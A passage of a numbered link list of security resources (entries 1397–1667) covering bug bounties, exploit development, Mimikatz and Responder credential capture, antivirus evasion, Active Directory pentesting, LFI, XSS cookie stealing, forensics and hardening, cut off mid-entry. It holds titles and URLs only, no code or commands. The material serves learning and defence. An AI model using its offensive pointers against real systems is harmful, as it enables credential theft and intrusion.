-1397-Top 30 Bug Bounty Programs in 2019: https://www.guru99.com/bug-bounty-programs.html -1398-Introduction - Book of BugBounty Tips: https://gowsundar.gitbook.io/book-of-bugbounty-tips/ -1399-List of bug bounty writeups: https://pentester.land/list-of-bug-bounty-writeups.html -1400-Tips From A Bugbounty Hunter: https://www.secjuice.com/bugbounty-hunter/ -1401-Cross Site Scripting (XSS) - Book of BugBounty Tips: https://gowsundar.gitbook.io/book-of-bugbounty-tips/cross-site-scripting-xss -1402-BugBountyTips: https://null0xp.wordpress.com/tag/bugbountytips/ -1403-Xss Filter Bypass Payloads: www.oroazteca.net/mq67/xss-filter-bypass-payloads.html -1404-Bug Bounty Methodology: https://eforensicsmag.com/bug-bounty-methodology-ttp-tacticstechniques-and-procedures-v-2-0 -1405-GDB cheat-sheet for exploit development: www.mannulinux.org/2017/01/gdb-cheat-sheet-for-exploit-development.html -1406-A Study in Exploit Development - Part 1: Setup and Proof of Concept : https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept -1407-Exploit development tutorial : https://www.computerweekly.com/tutorial/Exploit-development-tutorial-Part-Deux -1408-exploit code development: http://www.phreedom.org/presentations/exploit-code-development/exploit-code-development.pdf -1409-“Help Defeat Denial of Service Attacks: Step-by-Step”: http://www.sans.org/dosstep/ -1410-Internet Firewalls: Frequently Asked Questions: http://www.interhack.net/pubs/fwfaq/ -1411-Service Name and Transport Protocol Port Number: http://www.iana.org/assignments/port-numbers -1412-10 Useful Open Source Security Firewalls for Linux Systems: https://www.tecmint.com/open-source-security-firewalls-for-linux-systems/ -1413-40 Linux Server Hardening Security Tips: https://www.cyberciti.biz/tips/linux-security.html -1414-Linux hardening: A 15-step checklist for a secure Linux server : https://www.computerworld.com/.../linux-hardening-a-15-step-checklist-for-a-secure-linux-server -1415-25 Hardening Security Tips for Linux Servers: https://www.tecmint.com/linux-server-hardening-security-tips/ -1416-How to Harden Unix/Linux Systems & Close Security Gaps: https://www.beyondtrust.com/blog/entry/harden-unix-linux-systems-close-security-gaps -1417-34 Linux Server Security Tips & Checklists for Sysadmins: https://www.process.st/server-security/ -1418-Linux Hardening: https://www.slideshare.net/MichaelBoelen/linux-hardening -1419-23 Hardening Tips to Secure your Linux Server: https://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/ -1420-What is the Windows Registry? : https://www.computerhope.com/jargon/r/registry.htm -1421-Windows Registry, Everything You Need To Know: https://www.gammadyne.com/registry.htm -1422-Windows Registry Tutorial: https://www.akadia.com/services/windows_registry_tutorial.html -1423-5 Tools to Scan a Linux Server for Malware and Rootkits: https://www.tecmint.com/scan-linux-for-malware-and-rootkits/ -1424-Subdomain takeover dew to missconfigured project settings for Custom domain .: https://medium.com/bugbountywriteup/subdomain-takeover-dew-to-missconfigured-project-settings-for-custom-domain-46e90e702969 -1425-Massive Subdomains p0wned: https://medium.com/bugbountywriteup/massive-subdomains-p0wned-80374648336e -1426-Subdomain Takeover: Basics: https://0xpatrik.com/subdomain-takeover-basics/ -1427-Subdomain Takeover: Finding Candidates: https://0xpatrik.com/subdomain-takeover-candidates/ -1428-Bugcrowd's Domain & Subdomain Takeover!: https://bugbountypoc.com/bugcrowds-domain-takeover/ -1429-What Are Subdomain Takeovers, How to Test and Avoid Them?: https://dzone.com/articles/what-are-subdomain-takeovers-how-to-test-and-avoid -1430-Finding Candidates for Subdomain Takeovers: https://jarv.is/notes/finding-candidates-subdomain-takeovers/ -1431-Subdomain takeover of blog.snapchat.com: https://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7 -1432-Hostile Subdomain takeove: https://labs.detectify.com/tag/hostile-subdomain-takeover/ -1433-Microsoft Account Takeover Vulnerability Affecting 400 Million Users: https://www.safetydetective.com/blog/microsoft-outlook/ -1434-What is Subdomain Hijack/Takeover Vulnerability? How to Identify? & Exploit It?: https://blog.securitybreached.org/2017/10/11/what-is-subdomain-takeover-vulnerability/ -1435-Subdomain takeover detection with AQUATONE: https://michenriksen.com/blog/subdomain-takeover-detection-with-aquatone/ -1436-A hostile subdomain takeover! – Breaking application security: https://evilenigma.blog/2019/03/12/a-hostile-subdomain-takeover/ -1437-Web Development Reading List: https://www.smashingmagazine.com/2017/03/web-development-reading-list-172/ -1438-CSRF Attack can lead to Stored XSS: https://medium.com/bugbountywriteup/csrf-attack-can-lead-to-stored-xss-f40ba91f1e4f -1439-What is Mimikatz: The Beginner's Guide | Varonis: https://www.varonis.com/bog/what-is-mimikatz -1440-Preventing Mimikatz Attacks : https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5 -1441-Mimikatz tutorial: How it hacks Windows passwords, credentials: https://searchsecurity.techtarget.com/.../Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials -1442-Mimikatz: Walkthrough [Updated 2019]: https://resources.infosecinstitute.com/mimikatz-walkthrough/ -1443-Mimikatz -Windows Tutorial for Beginner: https://hacknpentest.com/mimikatz-windows-tutorial-beginners-guide-part-1/ -1444-Mitigations against Mimikatz Style Attacks: https://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks -1445-Exploring Mimikatz - Part 1 : https://blog.xpnsec.com/exploring-mimikatz-part-1/ -1446-Powershell AV Evasion. Running Mimikatz with PowerLine: https://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html -1447-How to Steal Windows Credentials with Mimikatz and Metasploit: https://www.hackingloops.com/mimikatz/ -1448-Retrieving NTLM Hashes without touching LSASS: https://www.andreafortuna.org/2018/03/26/retrieving-ntlm-hashes-without-touching-lsass-the-internal-monologue-attack/ -1449-From Responder to NT Authority\SYSTEM: https://medium.com/bugbountywriteup/from-responder-to-nt-authority-system-39abd3593319 -1450-Getting Creds via NTLMv2: https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html -1451-Living off the land: stealing NetNTLM hashes: https://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html -1452-(How To) Using Responder to capture passwords on a Windows: www.securityflux.com/?p=303 -1453-Pwning with Responder - A Pentester's Guide: https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/ -1454-LLMNR and NBT-NS Poisoning Using Responder: https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/ -1455-Responder - Ultimate Guide : https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/guide/ -1456-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1457-LM, NTLM, Net-NTLMv2, oh my! : https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4 -1458-SMB Relay Attack Tutorial: https://intrinium.com/smb-relay-attack-tutorial -1459-Cracking NTLMv2 responses captured using responder: https://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/ -1460-Skip Cracking Responder Hashes and Relay Them: https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/ -1461-Metasploit's First Antivirus Evasion Modules: https://blog.rapid7.com/2018/10/09/introducing-metasploits-first-evasion-module/ -1462-Evading Anti-virus Part 1: Infecting EXEs with Shellter: https://www.hackingloops.com/evading-anti-virus-shellter/ -1463-Evading AV with Shellter: https://www.securityartwork.es/2018/11/02/evading-av-with-shellter-i-also-have-sysmon-and-wazuh-i/ -1464-Shellter-A Shellcode Injecting Tool : https://www.hackingarticles.in/shellter-a-shellcode-injecting-tool/ -1465-Bypassing antivirus programs using SHELLTER: https://myhackstuff.com/shellter-bypassing-antivirus-programs/ -1466-John the Ripper step-by-step tutorials for end-users : openwall.info/wiki/john/tutorials -1467-Beginners Guide for John the Ripper (Part 1): https://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/ -1468-John the Ripper Basics Tutorial: https://ultimatepeter.com/john-the-ripper-basics-tutorial/ -1469-Crack Windows password with john the ripper: https://www.securitynewspaper.com/2018/11/27/crack-windows-password-with-john-the-ripper/ -1470-Getting Started Cracking Password Hashes with John the Ripper : https://www.tunnelsup.com/getting-started-cracking-password-hashes/ -1471-Shell code exploit with Buffer overflow: https://medium.com/@jain.sm/shell-code-exploit-with-buffer-overflow-8d78cc11f89b -1472-Shellcoding for Linux and Windows Tutorial : www.vividmachines.com/shellcode/shellcode.html -1473-Buffer Overflow Practical Examples : https://0xrick.github.io/binary-exploitation/bof5/ -1474-Msfvenom shellcode analysis: https://snowscan.io/msfvenom-shellcode-analysis/ -1475-Process Continuation Shellcode: https://azeria-labs.com/process-continuation-shellcode/ -1476-Dynamic Shellcode Execution: https://www.countercept.com/blog/dynamic-shellcode-execution/ -1477-Tutorials: Writing shellcode to binary files: https://www.fuzzysecurity.com/tutorials/7.html -1478-Creating Shellcode for an Egg Hunter : https://securitychops.com/2018/05/26/slae-assignment-3-egghunter-shellcode.html -1479-How to: Shellcode to reverse bind a shell with netcat : www.hackerfall.com/story/shellcode-to-reverse-bind-a-shell-with-netcat -1480-Bashing the Bash — Replacing Shell Scripts with Python: https://medium.com/capital-one-tech/bashing-the-bash-replacing-shell-scripts-with-python-d8d201bc0989 -1481-How to See All Devices on Your Network With nmap on Linux: https://www.howtogeek.com/.../how-to-see-all-devices-on-your-network-with-nmap-on-linux -1482-A Complete Guide to Nmap: https://www.edureka.co/blog/nmap-tutorial/ -1483-Nmap from Beginner to Advanced : https://resources.infosecinstitute.com/nmap/ -1484-Using Wireshark: Identifying Hosts and Users: https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/ -1485-tshark tutorial and filter examples: https://hackertarget.com/tshark-tutorial-and-filter-examples/ -1486-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example: https://www.guru99.com/fuzz-testing.html -1487-Tutorial: Dumb Fuzzing - Peach Community Edition: community.peachfuzzer.com/v3/TutorialDumbFuzzing.html -1488-HowTo: ExploitDev Fuzzing: https://hansesecure.de/2018/03/howto-exploitdev-fuzzing/ -1489-Fuzzing with Metasploit: https://www.corelan.be/?s=fuzzing -1490-Fuzzing – how to find bugs automagically using AFL: 9livesdata.com/fuzzing-how-to-find-bugs-automagically-using-afl/ -1491-Introduction to File Format Fuzzing & Exploitation: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3 -1492-0x3 Python Tutorial: Fuzzer: https://www.primalsecurity.net/0x3-python-tutorial-fuzzer/ -1493-Hunting For Bugs With AFL: https://research.aurainfosec.io/hunting-for-bugs-101/ -1494-Fuzzing: The New Unit Testing: https://www.slideshare.net/DmitryVyukov/fuzzing-the-new-unit-testing -1495-Fuzzing With Peach Framework: https://www.terminatio.org/fuzzing-peach-framework-full-tutorial-download/ -1496-How we found a tcpdump vulnerability using cloud fuzzing: https://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/ -1497-Finding a Fuzzer: Peach Fuzzer vs. Sulley: https://medium.com/@jtpereyda/finding-a-fuzzer-peach-fuzzer-vs-sulley-1fcd6baebfd4 -1498-Android malware analysis: https://www.slideshare.net/rossja/android-malware-analysis-71109948 -1499-15+ Malware Analysis Tools & Techniques : https://www.template.net/business/tools/malware-analysis/ -1500-30 Online Malware Analysis Sandboxes / Static Analyzers: https://medium.com/@su13ym4n/15-online-sandboxes-for-malware-analysis-f8885ecb8a35 -1501-Linux Command Line Forensics and Intrusion Detection Cheat Sheet: https://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/ -1502-Cheat Sheets - SANS Digital Forensics: https://digital-forensics.sans.org/community/cheat-sheets -1503-Breach detection with Linux filesystem forensics: https://opensource.com/article/18/4/linux-filesystem-forensics -1504-Digital Forensics Cheat Sheets Collection : https://neverendingsecurity.wordpress.com/digital-forensics-cheat-sheets-collection/ -1505-Security Incident Survey Cheat Sheet for Server Administrators: https://zeltser.com/security-incident-survey-cheat-sheet/ -1506-Digital forensics: A cheat sheet : https://www.techrepublic.com/article/digital-forensics-the-smart-persons-guide/ -1507-Windows Registry Forensics using 'RegRipper' Command-Line on Linux: https://www.pinterest.cl/pin/794815034207804059/ -1508-Windows IR Live Forensics Cheat Sheet: https://www.cheatography.com/koriley/cheat-sheets/windows-ir-live-forensics/ -1509-10 Best Known Forensics Tools That Works on Linux: https://linoxide.com/linux-how-to/forensics-tools-linux/ -1510-Top 20 Free Digital Forensic Investigation Tools for SysAdmins: https://techtalk.gfi.com/top-20-free-digital-forensic-investigation-tools-for-sysadmins/ -1511-Windows Volatile Memory Acquisition & Forensics 2018: https://medium.com/@lucideus/windows-volatile-memory-acquisition-forensics-2018-lucideus-forensics-3f297d0e5bfd -1512-PowerShell Cheat Sheet : https://www.digitalforensics.com/blog/powershell-cheat-sheet-2/ -1513-Forensic Artifacts: evidences of program execution on Windows systems: https://www.andreafortuna.org/forensic-artifacts-evidences-of-program-execution-on-windows-systems -1514-How to install a CPU?: https://www.computer-hardware-explained.com/how-to-install-a-cpu.html -1515-How To Upgrade and Install a New CPU or Motherboard: https://www.howtogeek.com/.../how-to-upgrade-and-install-a-new-cpu-or-motherboard-or-both -1516-Installing and Troubleshooting CPUs: www.pearsonitcertification.com/articles/article.aspx?p=1681054&seqNum=2 -1517-15 FREE Pastebin Alternatives You Can Use Right Away: https://www.rootreport.com/pastebin-alternatives/ -1518-Basic computer troubleshooting steps: https://www.computerhope.com/basic.htm -1519-18 Best Websites to Learn Computer Troubleshooting and Tech support: http://transcosmos.co.uk/best-websites-to-learn-computer-troubleshooting-and-tech-support -1520-Post Exploitation with PowerShell Empire 2.3.0 : https://www.yeahhub.com/post-exploitation-powershell-empire-2-3-0-detailed-tutorial/ -1521-Windows Persistence with PowerShell Empire : https://www.hackingarticles.in/windows-persistence-with-powershell-empire/ -1522-powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial: https://www.dudeworks.com/powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial -1523-Bypassing Anti-Virtus & Hacking Windows 10 Using Empire : https://zsecurity.org/bypassing-anti-virtus-hacking-windows-10-using-empire/ -1524-Hacking with Empire – PowerShell Post-Exploitation Agent : https://www.prodefence.org/hacking-with-empire-powershell-post-exploitation-agent/ -1525-Hacking Windows Active Directory Full guide: www.kalitut.com/hacking-windows-active-directory-full.html -1526-PowerShell Empire for Post-Exploitation: https://www.hackingloops.com/powershell-empire/ -1527-Generate A One-Liner – Welcome To LinuxPhilosophy!: linuxphilosophy.com/rtfm/more/empire/generate-a-one-liner/ -1528-CrackMapExec - Ultimate Guide: https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/ -1529-PowerShell Logging and Security: https://www.secjuice.com/enterprise-powershell-protection-logging/ -1530-Create your own FUD Backdoors with Empire: http://blog.extremehacking.org/blog/2016/08/25/create-fud-backdoors-empire/ -1531-PowerShell Empire Complete Tutorial For Beginners: https://video.hacking.reviews/2019/06/powershell-empire-complete-tutorial-for.html -1532-Bash Bunny: Windows Remote Shell using Metasploit & PowerShell: https://cyberarms.wordpress.com/.../bash-bunny-windows-remote-shell-using-metasploit-powershell -1533-Kerberoasting - Stealing Service Account Credentials: https://www.scip.ch/en/?labs.20181011 -1534-Automating Mimikatz with Empire and DeathStar : https://blog.stealthbits.com/automating-mimikatz-with-empire-and-deathstar/ -1535-Windows oneliners to get shell : https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/ -1536-ObfuscatedEmpire : https://cobbr.io/ObfuscatedEmpire.html -1537-Pentesting with PowerShell in six steps: https://periciacomputacional.com/pentesting-with-powershell-in-six-steps/ -1538-Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM): https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm -1539-PowerShell Security Best Practices: https://www.digitalshadows.com/blog-and-research/powershell-security-best-practices/ -1540-You can detect PowerShell attacks: https://www.slideshare.net/Hackerhurricane/you-can-detect-powershell-attacks -1541-Detecting and Preventing PowerShell Attacks: https://www.eventsentry.com/.../powershell-pw3rh311-detecting-preventing-powershell-attacks -1542-Detecting Offensive PowerShell Attack Tools – Active Directory Security: https://adsecurity.org/?p=2604 -1543-An Internal Pentest Audit Against Active Directory: https://www.exploit-db.com/docs/46019 -1544-A complete Active Directory Penetration Testing Checklist : https://gbhackers.com/active-directory-penetration-testing-checklist/ -1545-Active Directory | Penetration Testing Lab: https://pentestlab.blog/tag/active-directory/ -1546-Building and Attacking an Active Directory lab with PowerShell : https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell -1547-Penetration Testing in Windows Server Active Directory using Metasploit: https://www.hackingarticles.in/penetration-testing-windows-server-active-directory-using-metasploit-part-1 -1548-Red Team Penetration Testing – Going All the Way (Part 2 of 3) : https://www.anitian.com/red-team-testing-going-all-the-way-part2/ -1549-Penetration Testing Active Directory, Part II: https://www.jishuwen.com/d/2Mtq -1550-Gaining Domain Admin from Outside Active Directory: https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html -1551-Post Exploitation Cheat Sheet: https://0xsecurity.com/blog/some-hacking-techniques/post-exploitation-cheat-sheet -1552-Windows post-exploitation : https://github.com/emilyanncr/Windows-Post-Exploitation -1553-OSCP - Windows Post Exploitation : https://hackingandsecurity.blogspot.com/2017/9/oscp-windows-post-exploitation.html -1554-Windows Post-Exploitation Command List: http://pentest.tonyng.net/windows-post-exploitation-command-list/ -1555-Windows Post-Exploitation Command List: http://tim3warri0r.blogspot.com/2012/09/windows-post-exploitation-command-list.html -1556-Linux Post-Exploitation · OSCP - Useful Resources: https://backdoorshell.gitbooks.io/oscp-useful-links/content/linux-post-exploitation.html -1557-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -1558-Pentesting Cheatsheets - Red Teaming Experiments: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets -1559-OSCP Goldmine: http://0xc0ffee.io/blog/OSCP-Goldmine -1560-Linux Post Exploitation Cheat Sheet: http://red-orbita.com/?p=8455 -1562-OSCP useful resources and tools: https://acknak.fr/en/articles/oscp-tools/ -1563-Windows Post-Exploitation Command List : https://es.scribd.com/document/100182787/Windows-Post-Exploitation-Command-List -1564-Metasploit Cheat Sheet: https://pentesttools.net/metasploit-cheat-sheet/ -1565-Windows Privilege Escalation: https://awansec.com/windows-priv-esc.html -1566-Linux Unix Bsd Post Exploitation: https://attackerkb.com/Unix/LinuxUnixBSD_Post_Exploitation -1567-Privilege Escalation & Post-Exploitation: https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/ -1568-Metasploit Cheat Sheet: https://vk-intel.org/2016/12/28/metasploit-cheat-sheet/ -1569-Metasploit Cheat Sheet : https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/ -1570-Privilege escalation: Linux: https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux -1571-Cheat Sheets — Amethyst Security: https://www.ssddcyber.com/cheatsheets -1572-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1573-Cheatsheets: https://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt -1574-Are you ready for OSCP?: https://www.hacktoday.io/t/are-you-ready-for-oscp/59 -1575-Windows Privilege Escalation: https://labs.p64cyber.com/windows-privilege-escalation/ -1576-A guide to Linux Privilege Escalation: https://payatu.com/guide-linux-privilege-escalation/ -1577-Windows Post-Exploitation-Cheat-Sheet: http://pentestpanther.com/2019/07/01/windows-post-exploitation-cheat-sheet/ -1578-Windows Privilege Escalation (privesc) Resources: https://www.willchatham.com/security/windows-privilege-escalation-privesc-resources/ -1579-Dissecting Mobile Malware: https://slideplayer.com/slide/3434519/ -1580-Android malware analysis with Radare: Dissecting the Triada Trojan: www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triad/ -1581-Dissecting Mobile Native Code Packers: https://blog.zimperium.com/dissecting-mobile-native-code-packers-case-study/ -1582-What is Mobile Malware? Defined, Explained, and Explored: https://www.forcepoint.com/cyber-edu/mobile-malware -1583-Malware Development — Professionalization of an Ancient Art: https://medium.com/scip/malware-development-professionalization-of-an-ancient-art-4dfb3f10f34b -1584-Weaponizing Malware Code Sharing with Cythereal MAGIC: https://medium.com/@arun_73782/cythereal-magic-e68b0c943b1d -1585-Web App Pentest Cheat Sheet: https://medium.com/@muratkaraoz/web-app-pentest-cheat-sheet-c17394af773 -1586-The USB Threat is [Still] Real — Pentest Tools for Sysadmins, Continued: https://medium.com/@jeremy.trinka/the-usb-threat-is-still-real-pentest-tools-for-sysadmins-continued-88560af447bf -1587-How to Run An External Pentest: https://medium.com/@_jayhill/how-to-run-an-external-pentest-dd76ed14bb6a -1588-Advice for new pentesters: https://medium.com/@PentesterLab/advice-for-new-pentesters-a5f7d75a3aea -1589-NodeJS Application Pentest Tips: https://medium.com/bugbountywriteup/nodejs-application-pentest-tips-improper-uri-handling-in-express-390b3a07cb3e -1590-How to combine Pentesting with Automation to improve your security: https://medium.com/how-to-combine-pentest-with-automation-to-improve-your-security -1591-Day 79: FTP Pentest Guide: https://medium.com/@int0x33/day-79-ftp-pentest-guide-5106967bd50a -1592-SigintOS: A Wireless Pentest Distro Review: https://medium.com/@tomac/sigintos-a-wireless-pentest-distro-review-a7ea93ee8f8b -1593-Conducting an IoT Pentest : https://medium.com/p/6fa573ac6668?source=user_profile... -1594-Efficient way to pentest Android Chat Applications: https://medium.com/android-tamer/efficient-way-to-pentest-android-chat-applications-46221d8a040f -1595-APT2 - Automated PenTest Toolkit : https://medium.com/media/f1cf43d92a17d5c4c6e2e572133bfeed/href -1596-Pentest Tools and Distros: https://medium.com/hacker-toolbelt/pentest-tools-and-distros-9d738d83f82d -1597-Keeping notes during a pentest/security assessment/code review: https://blog.pentesterlab.com/keeping-notes-during-a-pentest-security-assessment-code-review-7e6db8091a66?gi=4c290731e24b -1598-An intro to pentesting an Android phone: https://medium.com/@tnvo/an-intro-to-pentesting-an-android-phone-464ec4860f39 -1599-The Penetration Testing Report: https://medium.com/@mtrdesign/the-penetration-testing-report-38a0a0b25cf2 -1600-VA vs Pentest: https://medium.com/@play.threepetsirikul/va-vs-pentest-cybersecurity-2a17250d5e03 -1601-Pentest: Hacking WPA2 WiFi using Aircrack on Kali Linux: https://medium.com/@digitalmunition/pentest-hacking-wpa2-wifi-using-aircrack-on-kali-linux-99519fee946f -1602-Pentesting Ethereum dApps: https://medium.com/@brandonarvanaghi/pentesting-ethereum-dapps-2a84c8dfee19 -1603-Android pentest lab in a nutshell : https://medium.com/@dortz/android-pentest-lab-in-a-nutshell-ee60be8638d3 -1604-Pentest Magazine: Web Scraping with Python : https://medium.com/@heavenraiza/web-scraping-with-python-170145fd90d3 -1605-Pentesting iOS apps without jailbreak: https://medium.com/securing/pentesting-ios-apps-without-jailbreak-91809d23f64e -1606-OSCP/Pen Testing Resources: https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45 -1607-Web Application Security & Bug Bounty (Methodology, Reconnaissance, Vulnerabilities, Reporting): https://blog.usejournal.com/web-application-security-bug-bounty-methodology-reconnaissance-vulnerabilities-reporting-635073cddcf2?gi=4a578db171dc -1608-Local File Inclusion (LFI) — Web Application Penetration Testing: https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601 -1609-Local File Inclusion (Basic): https://medium.com/@kamransaifullah786/local-file-inclusion-basic-242669a7af3 -1610-PHP File Inclusion Vulnerability: https://www.immuniweb.com/vulnerability/php-file-inclusion.html -1611-Local File Inclusion: https://teambi0s.gitlab.io/bi0s-wiki/web/lfi/ -1612-Web Application Penetration Testing: Local File Inclusion: https://hakin9.org/web-application-penetration-testing-local-file-inclusion-lfi-testing/ -1613-From Local File Inclusion to Code Execution : https://resources.infosecinstitute.com/local-file-inclusion-code-execution/ -1614-RFI / LFI: https://security.radware.com/ddos-knowledge-center/DDoSPedia/rfi-lfi/ -1615-From Local File Inclusion to Remote Code Execution - Part 2: https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2 -1616-Local File Inclusion: https://xapax.gitbooks.io/security/content/local_file_inclusion.html -1617-Beginner Guide to File Inclusion Attack (LFI/RFI) : https://www.hackingarticles.in/beginner-guide-file-inclusion-attack-lfirfi/ -1618-LFI / RFI: https://secf00tprint.github.io/blog/payload-tester/lfirfi/en -1619-LFI and RFI Attacks - All You Need to Know: https://www.getastra.com/blog/your-guide-to-defending-against-lfi-and-rfi-attacks/ -1620-Log Poisoning - LFI to RCE : http://liberty-shell.com/sec/2018/05/19/poisoning/ -1621-LFI: https://www.slideshare.net/cyber-punk/lfi-63050678 -1622-Hand Guide To Local File Inclusion(LFI): www.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html -1623-Local File Inclusion (LFI) - Cheat Sheet: https://ironhackers.es/herramientas/lfi-cheat-sheet/ -1624-Web Application Penetration Testing Local File Inclusion (LFI): https://www.cnblogs.com/Primzahl/p/6258149.html -1625-File Inclusion Vulnerability Prevention: https://www.pivotpointsecurity.com/blog/file-inclusion-vulnerabilities/ -1626-The Most In-depth Hacker's Guide: https://books.google.com/books?isbn=1329727681 -1627-Hacking Essentials: The Beginner's Guide To Ethical Hacking: https://books.google.com/books?id=e6CHDwAAQBAJ -1628-Web App Hacking, Part 11: Local File Inclusion: https://www.hackers-arise.com/.../Web-App-Hacking-Part-11-Local-File-Inclusion-LFI -1629-Local and remote file inclusion : https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi -1630-Upgrade from LFI to RCE via PHP Sessions : https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ -1631-CVV #1: Local File Inclusion: https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a -1632-(PDF) Cross Site Scripting (XSS) in Action: https://www.researchgate.net/publication/241757130_Cross_Site_Scripting_XSS_in_Action -1633-XSS exploitation part 1: www.securityidiots.com/Web-Pentest/XSS/xss-exploitation-series-part-1.html -1634-Weaponizing self-xss: https://silentbreaksecurity.com/weaponizing-self-xss/ -1635-Cookie Tracking and Stealing using Cross-Site Scripting: https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/ -1636-Defense against the Black Arts: https://books.google.com/books?isbn=1439821224 -1637-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens: https://www.acunetix.com/websitesecurity/csrf-attacks/ -1638-Bypassing CSRF protection: https://www.bugbountynotes.com/training/tutorial?id=5 -1639-Stealing CSRF tokens with XSS: https://digi.ninja/blog/xss_steal_csrf_token.php -1640-Same Origin Policy and ways to Bypass: https://medium.com/@minosagap/same-origin-policy-and-ways-to-bypass-250effdc4a12 -1641-Bypassing Same Origin Policy : https://resources.infosecinstitute.com/bypassing-same-origin-policy-sop/ -1642-Client-Side Attack - an overview : https://www.sciencedirect.com/topics/computer-science/client-side-attack -1643-Client-Side Injection Attacks: https://blog.alertlogic.com/blog/client-side-injection-attacks/ -1645-The Client-Side Battle Against JavaScript Attacks Is Already Here: https://medium.com/swlh/the-client-side-battle-against-javascript-attacks-is-already-here-656f3602c1f2 -1646-Why Let’s Encrypt is a really, really, really bad idea: https://medium.com/swlh/why-lets-encrypt-is-a-really-really-really-bad-idea-d69308887801 -1647-Huge Guide to Client-Side Attacks: https://www.notion.so/d382649cfebd4c5da202677b6cad1d40 -1648-OSCP Prep – Episode 11: Client Side Attacks: https://kentosec.com/2018/09/02/oscp-prep-episode-11-client-side-attacks/ -1649-Client side attack - AV Evasion: https://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack -1650-Client-Side Attack With Metasploit (Part 4): https://thehiddenwiki.pw/blog/2018/07/23/client-side-attack-metasploit/ -1651-Ransomware: Latest Developments and How to Defend Against Them: https://www.recordedfuture.com/latest-ransomware-attacks/ -1652-Cookie Tracking and Stealing using Cross-Site Scripting: https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/ -1653-How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords: https://null-byte.wonderhowto.com/.../write-xss-cookie-stealer-javascript-steal-passwords-0180833 -1654-How I was able to steal cookies via stored XSS in one of the famous e-commerce site: https://medium.com/@bhavarth33/how-i-was-able-to-steal-cookies-via-stored-xss-in-one-of-the-famous-e-commerce-site-3de8ab94437d -1655-Steal victim's cookie using Cross Site Scripting (XSS) : https://securityonline.info/steal-victims-cookie-using-cross-site-scripting-xss/ -1656-Remote Code Execution — Damn Vulnerable Web Application(DVWA) - Medium level security: https://medium.com/@mikewaals/remote-code-execution-damn-vulnerable-web-application-dvwa-medium-level-security-ca283cda3e86 -1657-Remote Command Execution: https://hacksland.net/remote-command-execution/ -1658-DevOops — An XML External Entity (XXE) HackTheBox Walkthrough: https://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2 -1659-XML External Entity - Beyond /etc/passwd (For Fun & Profit): https://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/ -1660-XXE - ZeroSec - Adventures In Information Security: https://blog.zsec.uk/out-of-band-xxe-2/ -1661-Exploitation: XML External Entity (XXE) Injection: https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection -1662-Hack The Box: DevOops: https://redteamtutorials.com/2018/11/11/hack-the-box-devoops/ -1663-Web Application Penetration Testing Notes: https://techvomit.net/web-application-penetration-testing-notes/ -1664-WriteUp – Aragog (HackTheBox) : https://ironhackers.es/en/writeups/writeup-aragog-hackthebox/ -1665-Linux Privilege Escalation Using PATH Variable: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ -1666-Linux Privilege Escalation via Automated Script : https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/ -1667-Privilege Escalation - Linux : 